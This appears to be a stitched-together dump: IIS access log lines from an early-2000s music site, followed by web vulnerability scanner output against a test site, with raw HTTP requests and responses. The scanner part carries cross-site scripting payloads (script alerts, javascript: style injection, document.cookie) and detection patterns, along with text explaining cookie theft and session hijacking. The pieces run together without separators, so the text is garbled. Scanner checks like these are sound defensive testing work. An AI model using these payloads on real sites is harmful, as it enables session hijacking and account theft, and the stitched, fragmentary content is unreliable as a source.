209.53.10.158, -, 1/11/00, 0:19:44, W3SVC6, PRIMUS, 209.153.254.45, 2406, 384, 22076, 200, 0, GET, /TheMP3Zone-News.html, -,
209.41.137.160, -, 1/11/00, 19:13:39, W3SVC6, PRIMUS, 209.153.254.45, 2563, 195, 3480, 200, 0, GET, /index.html, -,
209.41.137.160, -, 1/11/00, 19:14:33, W3SVC6, PRIMUS, 209.153.254.45, 53906, 254, 73288, 200, 64, GET, /fireworks/firewk-b.gif, -,
209.41.137.160, -, 1/11/00, 19:14:33, W3SVC6, PRIMUS, 209.153.254.45, 53437, 246, 64512, 200, 64, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:14:38, W3SVC6, PRIMUS, 209.153.254.45, 4312, 245, 5440, 200, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:14:50, W3SVC6, PRIMUS, 209.153.254.45, 2343, 272, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:14:53, W3SVC6, PRIMUS, 209.153.254.45, 3000, 265, 3028, 200, 0, GET, /BennettArts/back.gif, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 61375, 267, 4309, 200, 0, GET, /TheRockZone/index.html, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 76500, 366, 24525, 206, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 157, 286, 623, 404, 3, GET, /BennettArts/pics/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:15:54, W3SVC6, PRIMUS, 209.153.254.45, 0, 279, 623, 404, 3, GET, /BennettArts/pics/back.gif, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 26094, 281, 52155, 200, 64, GET, /TheRockZone/TheRockZone.jpg, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 531, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:16:20, W3SVC6, PRIMUS, 209.153.254.45, 469, 296, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:16:30, W3SVC6, PRIMUS, 209.153.254.45, 7656, 359, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:16:33, W3SVC6, PRIMUS, 209.153.254.45, 3094, 268, 3869, 200, 0, GET, /TheMovieZone/index.html, -,
209.41.137.160, -, 1/11/00, 19:16:33, W3SVC6, PRIMUS, 209.153.254.45, 10750, 352, 121, 304, 0, GET, /BennettArts/back.gif, -,
209.41.137.160, -, 1/11/00, 19:17:16, W3SVC6, PRIMUS, 209.153.254.45, 43563, 284, 38623, 200, 0, GET, /TheMovieZone/TheMovieZone.jpg, -,
209.41.137.160, -, 1/11/00, 19:18:04, W3SVC6, PRIMUS, 209.153.254.45, 47625, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:18:11, W3SVC6, PRIMUS, 209.153.254.45, 531, 283, 178, 304, 0, GET, /index.html, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 5750, 361, 32764, 206, 64, GET, /fireworks/firewk-b.gif, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 5406, 283, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.41.137.160, -, 1/11/00, 19:18:17, W3SVC6, PRIMUS, 209.153.254.45, 1250, 332, 121, 304, 0, GET, /sections.html, -,
209.41.137.160, -, 1/11/00, 19:19:24, W3SVC6, PRIMUS, 209.153.254.45, 65656, 359, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.41.137.160, -, 1/11/00, 19:19:24, W3SVC6, PRIMUS, 209.153.254.45, 65250, 352, 121, 304, 0, GET, /BennettArts/back.gif, -,
195.139.238.41, -, 1/11/00, 22:51:29, W3SVC6, PRIMUS, 209.153.254.45, 0, 466, 604, 404, 3, GET, /pcbuyersguide/hardware/printers/Best_Tabloid_Lasers-Q100.html, -,
195.139.238.41, -, 1/11/00, 22:51:35, W3SVC6, PRIMUS, 209.153.254.45, 1156, 406, 3480, 200, 0, GET, /index.html, -,
195.139.238.41, -, 1/11/00, 22:51:41, W3SVC6, PRIMUS, 209.153.254.45, 6000, 237, 73288, 200, 64, GET, /fireworks/firewk-b.gif, -,
195.139.238.41, -, 1/11/00, 22:51:44, W3SVC6, PRIMUS, 209.153.254.45, 8531, 229, 64512, 200, 64, GET, /TheMP3Zone.jpg, -,
195.34.192.2, -, 1/12/00, 12:07:38, W3SVC6, PRIMUS, 209.153.254.45, 0, 500, 623, 404, 3, GET, /pcbuyersguide/hardware/motherboards/motherboard-listings.html, -,
195.34.192.2, -, 1/12/00, 12:07:57, W3SVC6, PRIMUS, 209.153.254.45, 0, 494, 623, 404, 3, GET, /pcbuyersguide/hardware/motherboards/specs/J-M_Slot1.htm, -,
143.236.201.55, -, 1/12/00, 12:48:37, W3SVC6, PRIMUS, 209.153.254.45, 0, 389, 604, 404, 3, GET, /themp3zone/Michael_Hurst/recordings.html, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 188, 402, 178, 304, 0, GET, /index.html, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 1625, 387, 121, 304, 0, GET, /fireworks/firewk-b.gif, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 1844, 379, 121, 304, 0, GET, /TheMP3Zone.jpg, -,
209.53.10.158, -, 1/12/00, 16:33:24, W3SVC6, PRIMUS, 209.153.254.45, 312, 451, 121, 304, 0, GET, /sections.html, -,
209.53.10.158, -, 1/12/00, 16:34:26, W3SVC6, PRIMUS, 209.153.254.45, 60640, 405, 121, 304, 0, GET, /BennettArts/smallb-icon.GIF, -,
209.53.10.158, -, 1/12/00, 16:34:26, W3SVC6, PRIMUS, 209.153.254.45, 60594, 398, 121, 304, 0, GET, /BennettArts/back.gif, -,
206.132.186.140, -, 1/12/00, 19:59:22, W3SVC6, PRIMUS, 209.153.254.45, 0, 143, 604, 404, 2, GET, /robots.txt, -,
209.53.10.111, -, 1/12/00, 20:44:48, W3SVC6, PRIMUS, 209.153.254.45, 344, 401, 24173, 200, 0, GET, /TheMP3Zone-News.html, -,
209.53.10.111, -, 1/12/00, 20:44:48, W3SVC6, PRIMUS, 209.153.254.45, 656, 283, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
162.74.99.5, -, 1/12/00, 22:12:30, W3SVC6, PRIMUS, 209.153.254.45, 219, 315, 3480, 200, 0, GET, /index.html, -,
162.74.99.5, -, 1/12/00, 22:12:34, W3SVC6, PRIMUS, 209.153.254.45, 1406, 289, 64512, 200, 0, GET, /TheMP3Zone.jpg, -,
162.74.99.5, -, 1/12/00, 22:12:34, W3SVC6, PRIMUS, 209.153.254.45, 2063, 297, 73288, 200, 0, GET, /fireworks/firewk-b.gif, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 219, 365, 5440, 200, 0, GET, /sections.html, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 188, 315, 1955, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
162.74.99.5, -, 1/12/00, 22:12:42, W3SVC6, PRIMUS, 209.153.254.45, 187, 308, 3028, 200, 0, GET, /BennettArts/back.gif, -,
162.74.99.5, -, 1/12/00, 22:12:55, W3SVC6, PRIMUS, 209.153.254.45, 281, 392, 4970, 200, 0, GET, /TheClassicalZone/index.html, -,
162.74.99.5, -, 1/12/00, 22:12:57, W3SVC6, PRIMUS, 209.153.254.45, 1313, 339, 63606, 200, 0, GET, /TheClassicalZone/TheClassicalZone.jpg, -,
195.211.211.40, -, 1/13/00, 8:51:40, W3SVC6, PRIMUS, 209.153.254.45, 0, 419, 623, 404, 3, GET, /videobuyersguide/AdobeAfterEffects4.htm, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 188, 271, 3505, 200, 0, GET, /index.html, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 562, 325, 73313, 200, 0, GET, /fireworks/firewk-b.gif, -,
209.153.254.49, -, 1/13/00, 15:17:17, W3SVC6, PRIMUS, 209.153.254.45, 515, 317, 64537, 200, 0, GET, /TheMP3Zone.jpg, -,
194.83.240.17, -, 1/14/00, 5:33:19, W3SVC6, PRIMUS, 209.153.254.45, 0, 602, 604, 404, 3, GET, /themp3zone/TheRockZone/Yes/lostchapters.htm, -,
24.67.157.183, -, 1/14/00, 10:48:37, W3SVC6, PRIMUS, 209.153.254.45, 469, 351, 24174, 200, 0, GET, /TheMP3Zone-News.html, -,
24.67.157.183, -, 1/14/00, 10:48:37, W3SVC6, PRIMUS, 209.153.254.45, 985, 276, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
128.144.50.129, -, 1/14/00, 13:59:28, W3SVC6, PRIMUS, 209.153.254.45, 719, 363, 24198, 200, 0, GET, /TheMP3Zone-News.html, -,
128.144.50.129, -, 1/14/00, 13:59:28, W3SVC6, PRIMUS, 209.153.254.45, 1047, 332, 64537, 200, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:12:43, W3SVC6, PRIMUS, 209.153.254.45, 406, 319, 3481, 200, 0, GET, /index.html, -,
212.4.196.34, -, 1/15/00, 1:12:48, W3SVC6, PRIMUS, 209.153.254.45, 4657, 332, 73289, 200, 0, GET, /fireworks/firewk-b.gif, -,
212.4.196.35, -, 1/15/00, 1:12:48, W3SVC6, PRIMUS, 209.153.254.45, 1875, 324, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:13:20, W3SVC6, PRIMUS, 209.153.254.45, 453, 369, 5441, 200, 0, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:13:26, W3SVC6, PRIMUS, 209.153.254.45, 6062, 350, 1956, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
212.4.196.34, -, 1/15/00, 1:13:29, W3SVC6, PRIMUS, 209.153.254.45, 2906, 445, 20519, 206, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.34, -, 1/15/00, 1:13:29, W3SVC6, PRIMUS, 209.153.254.45, 297, 343, 3029, 200, 0, GET, /BennettArts/back.gif, -,
212.4.196.34, -, 1/15/00, 1:14:07, W3SVC6, PRIMUS, 209.153.254.45, 453, 393, 4399, 200, 0, GET, /TheTechnoZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:14:14, W3SVC6, PRIMUS, 209.153.254.45, 7453, 365, 58075, 200, 0, GET, /TheTechnoZone/TheTechnoZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:14:36, W3SVC6, PRIMUS, 209.153.254.45, 172, 323, 5441, 200, 64, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:14:57, W3SVC6, PRIMUS, 209.153.254.45, 469, 391, 4874, 200, 0, GET, /TheJazzZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:02, W3SVC6, PRIMUS, 209.153.254.45, 1438, 359, 46766, 200, 0, GET, /TheJazzZone/TheJazzZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 12437, 391, 4310, 200, 0, GET, /TheRockZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 891, 364, 623, 404, 3, GET, /BennettArts/pics/smallb-icon.GIF, -,
212.4.196.35, -, 1/15/00, 1:15:10, W3SVC6, PRIMUS, 209.153.254.45, 8625, 357, 623, 404, 3, GET, /BennettArts/pics/back.gif, -,
212.4.196.34, -, 1/15/00, 1:15:13, W3SVC6, PRIMUS, 209.153.254.45, 1578, 359, 52156, 200, 0, GET, /TheRockZone/TheRockZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:15:25, W3SVC6, PRIMUS, 209.153.254.45, 500, 393, 4731, 200, 0, GET, /TheCelticZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:27, W3SVC6, PRIMUS, 209.153.254.45, 2406, 365, 55492, 200, 0, GET, /TheCelticZone/TheCelticZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:15:54, W3SVC6, PRIMUS, 209.153.254.45, 422, 393, 3560, 200, 0, GET, /TheHipHopZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:15:57, W3SVC6, PRIMUS, 209.153.254.45, 2797, 365, 52070, 200, 0, GET, /TheHipHopZone/TheHipHopZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:16:09, W3SVC6, PRIMUS, 209.153.254.45, 500, 396, 4971, 200, 0, GET, /TheClassicalZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:16:14, W3SVC6, PRIMUS, 209.153.254.45, 5406, 374, 63607, 200, 0, GET, /TheClassicalZone/TheClassicalZone.jpg, -,
212.4.196.34, -, 1/15/00, 1:17:09, W3SVC6, PRIMUS, 209.153.254.45, 406, 394, 4972, 200, 0, GET, /TheAmbientZone/index.html, -,
212.4.196.34, -, 1/15/00, 1:17:16, W3SVC6, PRIMUS, 209.153.254.45, 6437, 368, 57693, 200, 0, GET, /TheAmbientZone/TheAmbientZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:19:48, W3SVC6, PRIMUS, 209.153.254.45, 172, 425, 122, 304, 0, GET, /TheMP3Zone.jpg, -,
212.4.196.35, -, 1/15/00, 1:19:48, W3SVC6, PRIMUS, 209.153.254.45, 172, 343, 3029, 200, 64, GET, /BennettArts/back.gif, -,
212.4.196.35, -, 1/15/00, 1:19:50, W3SVC6, PRIMUS, 209.153.254.45, 484, 392, 3751, 200, 0, GET, /TheHumorZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:19:52, W3SVC6, PRIMUS, 209.153.254.45, 2000, 362, 43243, 200, 0, GET, /TheHumorZone/TheHumorZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:20:02, W3SVC6, PRIMUS, 209.153.254.45, 9656, 401, 3713, 200, 0, GET, /TheJokeZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:20:07, W3SVC6, PRIMUS, 209.153.254.45, 4985, 359, 48404, 200, 0, GET, /TheJokeZone/TheJokeZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:22:22, W3SVC6, PRIMUS, 209.153.254.45, 421, 392, 3870, 200, 0, GET, /TheMovieZone/index.html, -,
212.4.196.35, -, 1/15/00, 1:22:27, W3SVC6, PRIMUS, 209.153.254.45, 5750, 360, 1956, 200, 0, GET, /BennettArts/smallb-icon.GIF, -,
212.4.196.34, -, 1/15/00, 1:22:27, W3SVC6, PRIMUS, 209.153.254.45, 1187, 362, 38624, 200, 0, GET, /TheMovieZone/TheMovieZone.jpg, -,
212.4.196.35, -, 1/15/00, 1:22:40, W3SVC6, PRIMUS, 209.153.254.45, 188, 323, 5441, 200, 64, GET, /sections.html, -,
212.4.196.34, -, 1/15/00, 1:22:45, W3SVC6, PRIMUS, 209.153.254.45, 16454, 337, 64513, 200, 0, GET, /TheMP3Zone.jpg, -,
IIS Server Log Disclosure (ex001221.log)
An IIS Log file was found.GET /W3SVC6/<attack>ex001221.log</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
2\d\d |401GET /join.asp?name=&email=&surname=&house=&street=&address2=--><script>alert('XSS')</script>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=<attack>--><script>alert('XSS')</script></attack>&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /plink.asp?a=b&c=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 216
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?a=b&c=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)POST /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:38:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 959
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was --><script>alert('XSS')</script><br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br>cboPage= --><script>alert('XSS')</script><br>
<b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
****** End of Head Data*******</pre><br>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Content-Length: 40
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>--><script>alert('XSS')</script></attack>--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=&surname=&house=&street=test@<script>alert(document.cookie)</script>.com&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:54:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4022
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
